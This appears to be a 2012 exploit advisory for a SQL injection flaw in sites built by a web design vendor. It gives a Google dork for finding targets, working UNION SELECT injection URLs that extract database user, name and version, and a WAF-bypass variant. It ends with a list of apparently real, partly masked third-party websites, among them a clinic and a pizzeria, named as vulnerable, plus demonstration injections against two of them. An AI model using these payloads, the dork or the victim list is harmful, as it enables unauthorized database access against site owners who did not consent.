# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
# Imagine virtual Sql Injection Vulnerability
# Google Dork: intext:"Design by imagine virtual" inurl:".php?id="
# Date: 15/12/2012
# Author: Sys32
# Email: tha.Sys32[at]gmail[dot]com
# Vendor: http://www.imaginevirtual.com
# Category: Webapp
# Tested on: Backtrack 5 r3
# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
# I. INFO.
# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
# The application is vulnerable to sql injection, allowing an attacker to gain full access to the database.
# Some injections need WAF bypass
#
# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
# II. EXPLOIT.
# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
# http://127.0.0.1/vull-page.php?id=[Sql-Injection]
#
# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
# III. EXPLOIT Example.
# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
# Injection:
#
# http://127.0.0.1/Vull-page.php?id=-3 union select 1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4--
#
# http://127.0.0.1/vull-page.php?id=-7' UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5,6,7,8,9,10,11+--+
#
# Injection + WAF Bypass:
#
# http://127.0.0.1/Vull-page.php?id=-3 /*!20000union*/+/*!20000SelEct*/ 1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4--
#
# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
# IV. Risk.
# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
# The security risk of the remote sql injection vulnerability is estimated as critical.
# ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
Demo Site:
http://www.fotoXXraflores.com/loja.php?id=4
http://www.foXXiraflores.com/loja.php?id=4' //unable load properly
http://www.incasadesign.com/quadros.php?id=204
http://www.incasadesign.com/quadros.php?id=204' //unable load properly
http://www.pizzXXdozoo.com/produto.php?id=7
http://www.pizzXXozoo.com/produto.php?id=7' // error !
http://www.in-timeclinic.com/especialidade.php?id=13
http://www.in-timeclinic.com/especialidade.php?id=13' // error
http://queXXnte.com/dynamic.php?id=15
http://qXXente.com/dynamic.php?id=15' //unable load properly
http://www.peXXtauto.pt/auto.php?id=74
http://www.perXXauto.pt/auto.php?id=74' //unable load properly
Demo Injection:
http://www.pizzXXozoo.com/produto.php?id=-7'
/*!20000union*/+/*!20000SelEct*/
1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5,6,7,8,9,10,11+--+
http://www.incXXXdesign.com/quadros.php?id=-204' UNION SELECT
1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16+--+